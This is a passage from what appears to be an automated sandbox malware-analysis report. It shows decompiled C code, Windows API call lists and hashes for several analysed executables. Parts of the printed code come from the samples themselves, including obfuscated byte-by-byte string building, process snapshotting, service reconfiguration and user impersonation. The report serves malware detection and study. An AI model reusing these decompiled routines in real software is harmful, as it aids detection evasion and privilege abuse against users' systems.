						 *0x10d9124 = 0x80070052;
						_t37 = 0;
					}
					CloseHandle(_t39);
				} else {
					 *0x10d9124 = 0x80070052;
					_t37 = 0;
				}
				return E010D6CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
			}

0x010d63cb
0x010d63d2
0x010d63d8
0x010d63ea
0x010d63f3
0x010d6401
0x010d6402
0x010d6410
0x010d6415
0x010d6433
0x010d6438
0x010d6449
0x010d6463
0x010d646d
0x010d6477
0x010d6477
0x010d647a
0x010d643a
0x010d643a
0x010d6444
0x010d6444
0x010d6492

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010D642D
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010D645B
CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010D647A

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D63EB

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: File$CloseCreateHandleWrite
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 1065093856-256195474
Opcode ID: a4c914cc1f779bfb7153c7227bcb1db490f3b54f0b6b9cc78c02f20476e52b55
Instruction ID: 5bbd6499e4c53cefcebf1d73443664a63cfe183eae6785cc64997445a9152d7d
Opcode Fuzzy Hash: a4c914cc1f779bfb7153c7227bcb1db490f3b54f0b6b9cc78c02f20476e52b55
Instruction Fuzzy Hash: 1921D271A0121CABDB20DF25DC85FEB77B8EB55314F0041A9F9C5A3280DAB66D848FA4

Uniqueness

Uniqueness Score: -1.00%

Function 010D47E0 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 64
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D47E0(intOrPtr* __ecx) {
				intOrPtr _t6;
				intOrPtr _t9;
				void* _t11;
				void* _t19;
				intOrPtr* _t22;
				void _t24;
				struct HWND__* _t25;
				struct HWND__* _t26;
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t33;
				void* _t34;

				_t33 = __ecx;
				_t34 = LocalAlloc(0x40, 8);
				if(_t34 != 0) {
					_t22 = _t33;
					_t27 = _t22 + 1;
					do {
						_t6 =  *_t22;
						_t22 = _t22 + 1;
					} while (_t6 != 0);
					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
					 *_t34 = _t24;
					if(_t24 != 0) {
						_t28 = _t33;
						_t19 = _t28 + 1;
						do {
							_t9 =  *_t28;
							_t28 = _t28 + 1;
						} while (_t9 != 0);
						E010D1680(_t24, _t28 - _t19 + 1, _t33);
						_t11 =  *0x10d91e0; // 0xf78ed8
						 *(_t34 + 4) = _t11;
						 *0x10d91e0 = _t34;
						return 1;
					}
					_t25 =  *0x10d8584; // 0x0
					E010D44B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
					LocalFree(_t34);
					L2:
					return 0;
				}
				_t26 =  *0x10d8584; // 0x0
				E010D44B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
				goto L2;
			}

0x010d47e8
0x010d47f0
0x010d47f4
0x010d480f
0x010d4811
0x010d4814
0x010d4814
0x010d4816
0x010d4817
0x010d4829
0x010d482b
0x010d482f
0x010d484f
0x010d4852
0x010d4855
0x010d4855
0x010d4857
0x010d4858
0x010d4860
0x010d4865
0x010d486a
0x010d486f
0x00000000
0x010d4876
0x010d4831
0x010d4841
0x010d4847
0x010d480b
0x00000000
0x010d480b
0x010d47f6
0x010d4806
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000008,?,00000000,010D4E6F), ref: 010D47EA
LocalAlloc.KERNEL32(00000040,?), ref: 010D4823
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 010D4847

Part of subcall function 010D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010D4518
Part of subcall function 010D44B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 010D4554

Strings

C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010D4851

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Local$Alloc$FreeLoadMessageString
String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
API String ID: 359063898-256195474
Opcode ID: a58a3a899438d97b0c10853c98933220b3655a5f6bc84e191ad388c09bf99c7a
Instruction ID: 284dbb8b0a433efc504399cfebdec424d2be6aa275117d5b70678501395b63be
Opcode Fuzzy Hash: a58a3a899438d97b0c10853c98933220b3655a5f6bc84e191ad388c09bf99c7a
Instruction Fuzzy Hash: 67115978600702AFD7258E34D808F7A3BAAEBC5380B048459FDC2C7749CA3AC806C720

Uniqueness

Uniqueness Score: -1.00%

Function 010D6517 Relevance: 6.1, APIs: 4, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E010D6517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
				struct HRSRC__* _t6;
				void* _t21;
				struct HINSTANCE__* _t23;
				int _t24;

				_t23 =  *0x10d9a3c; // 0x10d0000
				_t6 = FindResourceA(_t23, __edx, 5);
				if(_t6 == 0) {
					L6:
					E010D44B9(0, 0x4fb, 0, 0, 0x10, 0);
					_t24 = _a16;
				} else {
					_t21 = LoadResource(_t23, _t6);
					if(_t21 == 0) {
						goto L6;
					} else {
						if(_a12 != 0) {
							_push(_a12);
						} else {
							_push(0);
						}
						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
						FreeResource(_t21);
						if(_t24 == 0xffffffff) {
							goto L6;
						}
					}
				}
				return _t24;
			}

0x010d651f
0x010d652a
0x010d6534
0x010d656b
0x010d6577
0x010d657c
0x010d6536
0x010d653e
0x010d6542
0x00000000
0x010d6544
0x010d6547
0x010d654c
0x010d6549
0x010d6549
0x010d6549
0x010d655e
0x010d6560
0x010d6569
0x00000000
0x00000000
0x010d6569
0x010d6542
0x010d6587

APIs

FindResourceA.KERNEL32(010D0000,000007D6,00000005), ref: 010D652A
LoadResource.KERNEL32(010D0000,00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010D6538
DialogBoxIndirectParamA.USER32(010D0000,00000000,00000547,010D19E0,00000000), ref: 010D6557
FreeResource.KERNEL32(00000000,?,?,010D2EE8,00000000,010D19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010D6560

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Resource$DialogFindFreeIndirectLoadParam
String ID:
API String ID: 1214682469-0
Opcode ID: 0ab2235986e5f279fe6477af862cc22b1593146f91b9bd11e7a1315d78895f17
Instruction ID: aed24e866c42ca637af8de384db66d35843b2eb02d502c4f3ca50b76f4d709af
Opcode Fuzzy Hash: 0ab2235986e5f279fe6477af862cc22b1593146f91b9bd11e7a1315d78895f17
Instruction Fuzzy Hash: FF012672201305BBDB205EAD9C08DBB7AACEB85360F400165FE8093148DB77DD9087E0

Uniqueness

Uniqueness Score: -1.00%

Function 010D3680 Relevance: 6.1, APIs: 4, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D3680(void* __ecx) {
				void* _v8;
				struct tagMSG _v36;
				int _t8;
				struct HWND__* _t16;

				_v8 = __ecx;
				_t16 = 0;
				while(1) {
					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
					if(_t8 == 0) {
						break;
					}
					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
						continue;
					} else {
						do {
							if(_v36.message != 0x12) {
								DispatchMessageA( &_v36);
							} else {
								_t16 = 1;
							}
							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
						} while (_t8 != 0);
						if(_t16 == 0) {
							continue;
						}
					}
					break;
				}
				return _t8;
			}

0x010d368c
0x010d368f
0x010d3691
0x010d369f
0x010d36a7
0x00000000
0x00000000
0x010d36ba
0x00000000
0x010d36bc
0x010d36bc
0x010d36c0
0x010d36cb
0x010d36c2
0x010d36c4
0x010d36c4
0x010d36da
0x010d36e0
0x010d36e6
0x00000000
0x00000000
0x010d36e6
0x00000000
0x010d36ba
0x010d36ed

APIs

MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 010D369F
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36B2
DispatchMessageA.USER32(?), ref: 010D36CB
PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010D36DA

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Message$Peek$DispatchMultipleObjectsWait
String ID:
API String ID: 2776232527-0
Opcode ID: 7dd9e101b02d87f06a4b2265e03ef31e53d55ec63d90d0763abd4d60bcfe7f81
Instruction ID: 2c918aecab8941edd42efaa1b25861f3cb36b8ff51b8bc4c3f93e1ca00d6e39e
Opcode Fuzzy Hash: 7dd9e101b02d87f06a4b2265e03ef31e53d55ec63d90d0763abd4d60bcfe7f81
Instruction Fuzzy Hash: 590184B6A01214BBDB304AAA5C48EEB7ABCFB8AB10F004159BE55E6184D5658540CB71

Uniqueness

Uniqueness Score: -1.00%

Function 010D65E8 Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E010D65E8(char* __ecx) {
				char _t3;
				char _t10;
				char* _t12;
				char* _t14;
				char* _t15;
				CHAR* _t16;

				_t12 = __ecx;
				_t15 = __ecx;
				_t14 =  &(__ecx[1]);
				_t10 = 0;
				do {
					_t3 =  *_t12;
					_t12 =  &(_t12[1]);
				} while (_t3 != 0);
				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
				while(1) {
					_t16 = CharPrevA(_t15, ??);
					if(_t16 <= _t15) {
						break;
					}
					if( *_t16 == 0x5c) {
						L7:
						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
							_t16 = CharNextA(_t16);
						}
						 *_t16 = _t10;
						_t10 = 1;
					} else {
						_push(_t16);
						continue;
					}
					L11:
					return _t10;
				}
				if( *_t16 == 0x5c) {
					goto L7;
				}
				goto L11;
			}

0x010d65e8
0x010d65ed
0x010d65ef
0x010d65f2
0x010d65f4
0x010d65f4
0x010d65f6
0x010d65f7
0x010d6608
0x010d6611
0x010d6618
0x010d661c
0x00000000
0x00000000
0x010d660e
0x010d6623
0x010d6625
0x010d663b
0x010d663b
0x010d663d
0x010d6641
0x010d6610
0x010d6610
0x00000000
0x010d6610
0x010d6644
0x010d6647
0x010d6647
0x010d6621
0x00000000
0x00000000
0x00000000

APIs

CharPrevA.USER32(?,00000000,00000000,00000001,00000000,010D2B33), ref: 010D6602
CharPrevA.USER32(?,00000000), ref: 010D6612
CharPrevA.USER32(?,00000000), ref: 010D6629
CharNextA.USER32(00000000), ref: 010D6635

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: Char$Prev$Next
String ID:
API String ID: 3260447230-0
Opcode ID: 5b827f8f8263e58e8eedc8f8458702f2d122e1d97f0ed40b0ec5e91d0d2f51b0
Instruction ID: 350d4777d784009302cb0baba25f53c697e9720eb24dbe78834dcdf360136711
Opcode Fuzzy Hash: 5b827f8f8263e58e8eedc8f8458702f2d122e1d97f0ed40b0ec5e91d0d2f51b0
Instruction Fuzzy Hash: A6F0F436105250AEE7330A3C88888BBBFDCCF8F19471901EFF8D183101D61B0A468761

Uniqueness

Uniqueness Score: -1.00%

Function 010D69B0 Relevance: 6.0, APIs: 4, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E010D69B0() {
				intOrPtr* _t4;
				intOrPtr* _t5;
				void* _t6;
				intOrPtr _t11;
				intOrPtr _t12;

				 *0x10d81f8 = E010D6C70();
				__set_app_type(E010D6FBE(2));
				 *0x10d88a4 =  *0x10d88a4 | 0xffffffff;
				 *0x10d88a8 =  *0x10d88a8 | 0xffffffff;
				_t4 = __p__fmode();
				_t11 =  *0x10d8528; // 0x0
				 *_t4 = _t11;
				_t5 = __p__commode();
				_t12 =  *0x10d851c; // 0x0
				 *_t5 = _t12;
				_t6 = E010D7000();
				if( *0x10d8000 == 0) {
					__setusermatherr(E010D7000);
				}
				E010D71EF(_t6);
				return 0;
			}

0x010d69b7
0x010d69c2
0x010d69c8
0x010d69cf
0x010d69d8
0x010d69de
0x010d69e4
0x010d69e6
0x010d69ec
0x010d69f2
0x010d69f4
0x010d6a00
0x010d6a07
0x010d6a0d
0x010d6a0e
0x010d6a15

APIs

Part of subcall function 010D6FBE: GetModuleHandleW.KERNEL32(00000000), ref: 010D6FC5

__set_app_type.MSVCRT ref: 010D69C2
__p__fmode.MSVCRT ref: 010D69D8
__p__commode.MSVCRT ref: 010D69E6
__setusermatherr.MSVCRT ref: 010D6A07

Memory Dump Source

Source File: 00000003.00000002.318831834.00000000010D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010D0000, based on PE: true

Associated: 00000003.00000002.318826623.00000000010D0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318845380.00000000010D8000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DA000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.318851409.00000000010DC000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10d0000_kino4801.jbxd

Similarity

API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
String ID:
API String ID: 1632413811-0
Opcode ID: df4ed87496422af2e75684e81de96fef5c0aa240d16a41e368b06c9d3ae3d542
Instruction ID: e9d79926b77dc85f9fdf045a933b12e3c7408e8d0c93c7ec04f942a72490e41e
Opcode Fuzzy Hash: df4ed87496422af2e75684e81de96fef5c0aa240d16a41e368b06c9d3ae3d542
Instruction Fuzzy Hash: 70F0F274606302CFC778AB3AE50A7283BA1FB04321B10864AECE2862D8CB3F85408B10

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: bus7600.exePID: 4084, Parent PID: 6116COMMON

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FFBACD21B10 Relevance: 2.0, APIs: 1, Instructions: 540
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ChangeServiceConfigA.ADVAPI32 ref: 00007FFBACD21FD1

Memory Dump Source

Source File: 00000004.00000002.290569209.00007FFBACD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffbacd20000_bus7600.jbxd

Similarity

API ID: ChangeConfigService
String ID:
API String ID: 3849694230-0
Opcode ID: 65e11dde944e1f8a6991f9b67b3fc8cc805a58c66ea71e5e9b184db46c0f0f14
Instruction ID: 50c6616ef52d6e322139a684f29670cb9329861dcb17f484b33f6e583727f0be
Opcode Fuzzy Hash: 65e11dde944e1f8a6991f9b67b3fc8cc805a58c66ea71e5e9b184db46c0f0f14
Instruction Fuzzy Hash: 96F19670618A4D4FEB68DF28D84A7F977D1FB54310F10827EEC9EC7291DA7499818782

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBACD2077D Relevance: 1.8, APIs: 1, Instructions: 263
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameA.ADVAPI32 ref: 00007FFBACD20989

Memory Dump Source

Source File: 00000004.00000002.290569209.00007FFBACD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffbacd20000_bus7600.jbxd

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: abbcc54a244bb30f34a95d5815e8a80dd9eeb84ad90dac5532b6d2513f58c4f5
Instruction ID: c8c605886dbd33ec0be556cdc0ce83ef540388490a8da6394de653aecf6e46a1
Opcode Fuzzy Hash: abbcc54a244bb30f34a95d5815e8a80dd9eeb84ad90dac5532b6d2513f58c4f5
Instruction Fuzzy Hash: 01918070618A4D8FEB68EF28C8597E977E1FF58310F04413AE84EC7291DB75A981CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBACD20C34 Relevance: 1.7, APIs: 1, Instructions: 205
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenServiceA.ADVAPI32 ref: 00007FFBACD20D99

Memory Dump Source

Source File: 00000004.00000002.290569209.00007FFBACD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffbacd20000_bus7600.jbxd

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 0984ed7e5e3c532243b45631e4a87b108e98b58ec12648737be1e5306f498f89
Instruction ID: bb736b368b5fd48e39e0277985e3bac1912d9253b3f5223b9c07c6fdf79e52f6
Opcode Fuzzy Hash: 0984ed7e5e3c532243b45631e4a87b108e98b58ec12648737be1e5306f498f89
Instruction Fuzzy Hash: E2519370618A4D4FEB58EF28C84A7F97BD1FB59311F10412EE85DC3292DA74E8818B81

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBACD20B2D Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenSCManagerW.ADVAPI32 ref: 00007FFBACD20BFA

Memory Dump Source

Source File: 00000004.00000002.290569209.00007FFBACD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffbacd20000_bus7600.jbxd

Similarity

API ID: ManagerOpen
String ID:
API String ID: 1889721586-0
Opcode ID: 31c62dcc83a70e0742a460ece0884cea7539461ba783bb0da4d37c2af7df37be
Instruction ID: 3f118ef8445ce7d1b4cd44208f295f4bbfcabd3ba8ddfd207798ee09efaf656f
Opcode Fuzzy Hash: 31c62dcc83a70e0742a460ece0884cea7539461ba783bb0da4d37c2af7df37be
Instruction Fuzzy Hash: 4F31A271908A1C8FDB29DF98D8496FABBF0EB55311F10416FD04AD3552DF70A445CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBACD2108A Relevance: 1.6, APIs: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE ref: 00007FFBACD21145

Memory Dump Source

Source File: 00000004.00000002.290569209.00007FFBACD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffbacd20000_bus7600.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: a737e27d27b17c095a8a63a666a6a2ed4d2ea6a923c37384bf74f259a3f866b1
Instruction ID: 4e7e5e05cddde82e10da7787da7ca99be0f10aeabf0e2d2faa1788b0932568c7
Opcode Fuzzy Hash: a737e27d27b17c095a8a63a666a6a2ed4d2ea6a923c37384bf74f259a3f866b1
Instruction Fuzzy Hash: 8C31087090C78C5FDB1ADB688C157E9BFF0EF56320F14429FD089C31A2DA656856CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBACD21A1D Relevance: 1.6, APIs: 1, Instructions: 117
serviceCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ControlService.ADVAPI32 ref: 00007FFBACD21ACB

Memory Dump Source

Source File: 00000004.00000002.290569209.00007FFBACD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffbacd20000_bus7600.jbxd

Similarity

API ID: ControlService
String ID:
API String ID: 253159669-0
Opcode ID: 20f5f840c2f0d246532b4cecb2255cd82e285bb5ca0104780596baa26b9bed24
Instruction ID: 50e409829a67e6dc79986079f25528b1387718c4f36e118671d360e1682b8b8d
Opcode Fuzzy Hash: 20f5f840c2f0d246532b4cecb2255cd82e285bb5ca0104780596baa26b9bed24
Instruction Fuzzy Hash: 1531D37190CA588FDB18EF98D849AF97BF0EF65311F04417EE08AD3652CB74A806CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFBACD21760 Relevance: 1.6, APIs: 1, Instructions: 99
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ImpersonateLoggedOnUser.KERNELBASE ref: 00007FFBACD217F5

Memory Dump Source

Source File: 00000004.00000002.290569209.00007FFBACD20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFBACD20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7ffbacd20000_bus7600.jbxd

Similarity

API ID: ImpersonateLoggedUser
String ID:
API String ID: 2216092060-0
Opcode ID: 7cf93a5ab02c3f91f6e3d99bf2dfad40ea091e16736c9d9d13f7f76862e16e7b
Instruction ID: 6c8bfbfb676d8c461734d2563eeb9104d8dd425026a7e210cf64512caec44dec
Opcode Fuzzy Hash: 7cf93a5ab02c3f91f6e3d99bf2dfad40ea091e16736c9d9d13f7f76862e16e7b
Instruction Fuzzy Hash: 1A31E570908A4C9FDB59DF68C845BF9BBE0FF65321F00422ED049C3592DB74A856CB91

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: con1165.exePID: 5392, Parent PID: 6116COMMON

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E004019F0(void* __edx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t337;
				void* _t340;
				int _t341;
				CHAR* _t344;
				intOrPtr* _t349;
				int _t350;
				long _t352;
				signed int _t354;
				intOrPtr _t358;
				long _t359;
				CHAR* _t364;
				struct HINSTANCE__* _t365;
				CHAR* _t366;
				_Unknown_base(*)()* _t367;
				int _t368;
				int _t369;
				int _t370;
				intOrPtr* _t376;
				int _t378;
				intOrPtr _t379;
				intOrPtr* _t381;
				int _t383;
				intOrPtr* _t384;
				int _t385;
				int _t396;
				int _t399;
				int _t402;
				int _t405;
				intOrPtr* _t407;
				int _t413;
				int _t415;
				void* _t421;
				int _t422;
				int _t424;
				intOrPtr* _t428;
				intOrPtr _t429;
				intOrPtr* _t431;
				int _t432;
				int _t435;
				intOrPtr* _t437;
				int _t438;
				intOrPtr* _t439;
				int _t440;
				int _t442;
				signed int _t448;
				signed int _t451;
				signed int _t452;
				int _t469;
				int _t471;
				int _t482;
				signed int _t486;
				intOrPtr* _t488;
				intOrPtr* _t490;
				intOrPtr* _t492;
				intOrPtr _t493;
				void* _t494;
				struct HRSRC__* _t497;
				void* _t514;
				int _t519;
				intOrPtr* _t520;
				void* _t524;
				void* _t525;
				struct HINSTANCE__* _t526;
				intOrPtr _t527;
				void* _t531;
				void* _t535;
				struct HRSRC__* _t536;
				intOrPtr* _t537;
				intOrPtr* _t539;
				int _t542;
				int _t543;
				intOrPtr* _t547;
				intOrPtr* _t548;
				intOrPtr* _t549;
				intOrPtr* _t550;
				void* _t551;
				intOrPtr _t552;
				int _t555;
				void* _t556;
				void* _t557;
				void* _t558;
				void* _t559;
				void* _t560;
				void* _t561;
				void* _t562;
				intOrPtr* _t563;
				void* _t564;
				void* _t565;
				void* _t566;
				void* _t567;

				_t567 = __eflags;
				_t494 = __edx;
				__imp__OleInitialize(0); // executed
				 *((char*)(_t556 + 0x18)) = 0xe0;
				 *((char*)(_t556 + 0x19)) = 0x3b;
				 *((char*)(_t556 + 0x1a)) = 0x8d;
				 *((char*)(_t556 + 0x1b)) = 0x2a;
				 *((char*)(_t556 + 0x1c)) = 0xa2;
				 *((char*)(_t556 + 0x1d)) = 0x2a;
				 *((char*)(_t556 + 0x1e)) = 0x2a;
				 *((char*)(_t556 + 0x1f)) = 0x41;
				 *((char*)(_t556 + 0x20)) = 0xd3;
				 *((char*)(_t556 + 0x21)) = 0x20;
				 *((char*)(_t556 + 0x22)) = 0x64;
				 *((char*)(_t556 + 0x23)) = 6;
				 *((char*)(_t556 + 0x24)) = 0x8a;
				 *((char*)(_t556 + 0x25)) = 0xf7;
				 *((char*)(_t556 + 0x26)) = 0x3d;
				 *((char*)(_t556 + 0x27)) = 0x9d;
				 *((char*)(_t556 + 0x28)) = 0xd9;
				 *((char*)(_t556 + 0x29)) = 0xee;
				 *((char*)(_t556 + 0x2a)) = 0x15;
				 *((char*)(_t556 + 0x2b)) = 0x68;
				 *((char*)(_t556 + 0x2c)) = 0xf4;
				 *((char*)(_t556 + 0x2d)) = 0x76;
				 *((char*)(_t556 + 0x2e)) = 0xb9;
				 *((char*)(_t556 + 0x2f)) = 0x34;
				 *((char*)(_t556 + 0x30)) = 0xbf;
				 *((char*)(_t556 + 0x31)) = 0x1e;
				 *((char*)(_t556 + 0x32)) = 0xe7;
				 *((char*)(_t556 + 0x33)) = 0x78;
				 *((char*)(_t556 + 0x34)) = 0x98;
				 *((char*)(_t556 + 0x35)) = 0xe9;
				 *((char*)(_t556 + 0x36)) = 0x6f;
				 *((char*)(_t556 + 0x37)) = 0xb4;
				 *((char*)(_t556 + 0x38)) = 0;
				_push(E00401650(_t556 + 0x14, _t556 + 0x114));
				_t337 = E0040B99E(0, _t494, _t524, _t535, _t567);
				_t557 = _t556 + 0xc;
				if(_t337 == 0x41b2a0) {
					L80:
					__eflags = 0;
					return 0;
				} else {
					_t340 = CreateToolhelp32Snapshot(8, GetCurrentProcessId()); // executed
					_t525 = _t340;
					 *((intOrPtr*)(_t557 + 0x280)) = 0x224;
					 *((char*)(_t557 + 0x64)) = 0xce;
					 *((char*)(_t557 + 0x65)) = 0x27;
					 *((char*)(_t557 + 0x66)) = 0x9c;
					 *((char*)(_t557 + 0x67)) = 0x1a;
					 *((char*)(_t557 + 0x68)) = 0x95;
					 *((char*)(_t557 + 0x69)) = 0x2e;
					 *((char*)(_t557 + 0x6a)) = 0x22;
					 *((char*)(_t557 + 0x6b)) = 0x57;
					 *((char*)(_t557 + 0x6c)) = 0x91;
					 *((char*)(_t557 + 0x6d)) = 0x21;
					 *((char*)(_t557 + 0x6e)) = 0x57;
					 *((char*)(_t557 + 0x6f)) = 0x3a;
					 *((char*)(_t557 + 0x70)) = 0xf8;
					 *((char*)(_t557 + 0x71)) = 0x98;
					 *((char*)(_t557 + 0x72)) = 0x5b;
					 *((char*)(_t557 + 0x73)) = 0xf4;
					 *((char*)(_t557 + 0x74)) = 0xb5;
					 *((char*)(_t557 + 0x75)) = 0x87;
